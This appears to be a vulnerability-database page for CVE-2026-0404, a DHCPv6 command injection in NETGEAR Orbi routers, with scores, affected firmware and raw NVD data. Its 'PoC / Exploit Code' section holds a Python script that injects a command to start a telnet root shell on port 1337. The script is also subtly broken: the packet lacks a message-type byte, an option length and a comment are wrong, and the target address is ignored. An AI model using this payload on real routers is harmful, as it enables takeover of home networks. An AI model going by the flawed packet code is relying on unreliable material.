Security Vulnerability Report
CVE-2026-0404 CVSS 8.0 HIGH

CVE-2026-0404

Published: 2026-01-13 16:16:10
Last Modified: 2026-02-12 17:36:10
Source: a2826606-91e7-4eb6-899e-8484bd4575d5

Description

An insufficient input validation vulnerability in NETGEAR Orbi devices' DHCPv6 functionality allows network adjacent attackers authenticated over WiFi or on LAN to execute OS command injections on the router. DHCPv6 is not enabled by default.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:netgear:rbr750_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rbr750:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rbr840_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rbr840:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rbr850_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rbr850:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rbr860_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rbr860:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:netgear:rbs750_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:rbs750:-:*:*:*:*:*:*:* - NOT VULNERABLE
NETGEAR Orbi RBR750 < latest firmware version
NETGEAR Orbi RBR840 < latest firmware version
NETGEAR Orbi RBR850 < latest firmware version
NETGEAR Orbi RBR860 < latest firmware version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2026-0404 PoC - NETGEAR Orbi DHCPv6 Command Injection # Author: Security Researcher # Note: For authorized security testing only import socket import struct import sys from datetime import datetime def build_dhcpv6_packet(): """Build malicious DHCPv6 packet with command injection payload""" # DHCPv6 Message Type: Solicit (1) transaction_id = b'\x00\x00\x01' # Client Identifier Option (1) - DUID-LL duid = b'\x00\x03\x00\x00\x00\x01\x00\x01' duid += b'\x12\x34\x56\x78\x9a\xbc' # Hardware address client_id = b'\x00\x01' + struct.pack('>H', len(duid)) + duid # INJECTED PAYLOAD - Command injection in Option 39 (User Class) # This demonstrates the vulnerability where shell commands can be injected injected_cmd = ';telnetd -p 1337 -l /bin/sh #' # Example: Enable telnet # Encoded as DHCPv6 option payload = injected_cmd.encode('utf-8') user_class_option = b'\x00\x27' + struct.pack('>H', len(payload)) + payload # Reordered Options (9) - Request specific options option_request = b'\x00\x06\x00\x04\x00\x17\x00\x18' # Vendor Class Option (16) - Another injection point vendor_class = b'\x00\x10\x00\x1eNETGEAR Orbi' # Assemble the packet packet = transaction_id + client_id + user_class_option + option_request + vendor_class return packet def send_exploit(target_ip, target_port=547): """Send the malicious DHCPv6 packet""" print(f"[*] Building malicious DHCPv6 packet for {target_ip}") print(f"[*] Target: NETGEAR Orbi Router") print(f"[*] Vulnerability: CVE-2026-0404 - DHCPv6 Command Injection") # Create UDP socket for DHCPv6 sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) # Multicast address for DHCPv6 servers multicast_addr = 'ff02::1:2' packet = build_dhcpv6_packet() print(f"[*] Sending malicious DHCPv6 Solicit packet...") print(f"[*] Packet size: {len(packet)} bytes") print(f"[*] Injection payload: Command injection in DHCPv6 options") try: sock.sendto(packet, (multicast_addr, target_port)) print(f"[+] Packet sent successfully") print(f"[!] 
If DHCPv6 is enabled and vulnerable, command will be executed") except Exception as e: print(f"[-] Error sending packet: {e}") finally: sock.close() def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2026-0404_poc.py <target_ip>") print("Example: python3 cve-2026-0404_poc.py 192.168.1.1") sys.exit(1) target = sys.argv[1] print(f"[*] CVE-2026-0404 - NETGEAR Orbi DHCPv6 Command Injection PoC") print(f"[*] Target: {target}") print(f"[*] Time: {datetime.now()}") send_exploit(target) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0404", "sourceIdentifier": "a2826606-91e7-4eb6-899e-8484bd4575d5", "published": "2026-01-13T16:16:10.343", "lastModified": "2026-02-12T17:36:09.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An insufficient input validation vulnerability in NETGEAR Orbi devices' \nDHCPv6 functionality allows network adjacent attackers authenticated \nover WiFi or on LAN to execute OS command injections on the router. \nDHCPv6 is not enabled by default."}, {"lang": "es", "value": "Una vulnerabilidad de validación de entrada insuficiente en la funcionalidad DHCPv6 de los dispositivos NETGEAR Orbi permite a atacantes adyacentes a la red, autenticados a través de WiFi o en la LAN, ejecutar inyecciones de comandos del sistema operativo en el router. DHCPv6 no está habilitado por defecto."}], "metrics": {"cvssMetricV40": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NO", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbr750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8.5", "matchCriteriaId": "0D73C133-BD68-4532-B267-61796ECB1A07"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbr750:-:*:*:*:*:*:*:*", "matchCriteriaId": "C13F5C69-FA9B-472A-9036-0C2967BDCDE9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbr840_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8.5", "matchCriteriaId": "9C730F75-337C-44C5-9DE7-E532D7C3C8BC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": 
"cpe:2.3:h:netgear:rbr840:-:*:*:*:*:*:*:*", "matchCriteriaId": "4489CB05-A1C0-408C-8D8C-56EE98CA20E8"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbr850_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8.5", "matchCriteriaId": "7E5B3B94-CC3D-4CFC-9FE2-9EF5CEBD4B1A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbr850:-:*:*:*:*:*:*:*", "matchCriteriaId": "D92E4C8E-222A-476C-8273-F7171FC61F0B"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbr860_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8.5", "matchCriteriaId": "659D5BE0-C045-48FD-9214-B35D408AF0BA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbr860:-:*:*:*:*:*:*:*", "matchCriteriaId": "928FC2C1-4D05-495B-ACD8-1D013EB18EE6"}]}]}, {"operator": "AND", "nodes": [{"operator": ... (truncated)